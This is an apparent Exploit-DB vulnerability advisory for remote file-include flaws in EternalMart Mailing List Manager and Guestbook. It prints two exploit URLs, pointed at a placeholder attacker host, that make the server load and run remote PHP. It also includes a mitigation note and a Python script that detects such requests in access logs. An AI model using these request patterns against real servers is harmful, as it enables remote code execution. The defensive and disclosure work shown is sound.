Vendor: Mailing List Manager and Guestbook
By: SecurityFocus
CVSS: 7.5 (HIGH)
Type: Remote File Include
CWE: 98
Product Name: Mailing List Manager and Guestbook
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

EternalMart Mailing List Manager and Guestbook Remote File Include Vulnerability

EternalMart Mailing List Manager and Guestbook are prone to remote file-include vulnerabilities. Remote attackers may cause malicious PHP code to run on the webserver.

http://[target]/admin/auth.php?emml_admin_path=http://[attacker] will include the file: http://[attacker]/auth_func.php

http://[target]/emml_email_func.php?emml_path=http://[attacker] will include the file: http://[attacker]/class.html.mime.mail.php

Mitigation:

Ensure that the application is not vulnerable to remote file inclusion attacks by validating user-supplied input.
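
A log check for the two request patterns described above, as an added example that is not part of the original advisory: it flags access-log entries where `emml_admin_path` or `emml_path` carries a URL on the scripts the advisory names. The log lines, addresses and hostnames are constructed, and the function names `flag_line` and `scan` are hypothetical.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Script path -> request parameter, both taken from the advisory text.
WATCHED = {
    "/admin/auth.php": "emml_admin_path",
    "/emml_email_func.php": "emml_path",
}
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')      # request line in a log entry
REMOTE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.I)  # value starts with scheme://

# Constructed sample entries (documentation addresses and hostnames only).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /admin/auth.php?emml_admin_path=http://files.example.test HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /lists/emml_email_func.php?emml_path=http%253A%252F%252Ffiles.example.test HTTP/1.1" 200 87',
    '192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /admin/auth.php HTTP/1.1" 200 900',
    '192.0.2.13 - - [01/Jan/2024:10:00:12 +0000] "GET /emml_email_func.php?emml_path=./lib HTTP/1.1" 200 87',
    '192.0.2.14 - - [01/Jan/2024:10:00:15 +0000] "GET /index.php?emml_path=http://files.example.test HTTP/1.1" 200 87',
]

def flag_line(line):
    """Return (script, param, value) when a watched parameter carries a URL, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    try:
        parts = urlsplit(m.group(1))
    except ValueError:
        return None
    path = parts.path.lower()
    for script, param in WATCHED.items():
        if not path.endswith(script):
            continue
        for value in parse_qs(parts.query, keep_blank_values=True).get(param, []):
            value = unquote(value)  # second decode catches double-encoded values
            if REMOTE.match(value):
                return script, param, value
    return None

def scan(lines):
    """Return [(line_number, script, param, value)] for every flagged entry."""
    hits = []
    for number, line in enumerate(lines, start=1):
        hit = flag_line(line)
        if hit:
            hits.append((number, *hit))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Only query-string values appear in access logs, so requests that carry the parameter elsewhere are not seen by this check.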
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8767/info

EternalMart Mailing List Manager and Guestbook are prone to remote file-include vulnerabilities. Remote attackers may cause malicious PHP code to run on the webserver. 

http://[target]/admin/auth.php?emml_admin_path=http://[attacker] will
include the file :
http://[attacker]/auth_func.php

http://[target]/emml_email_func.php?emml_path=http://[attacker] will
include the file :
http://[attacker]/class.html.mime.mail.php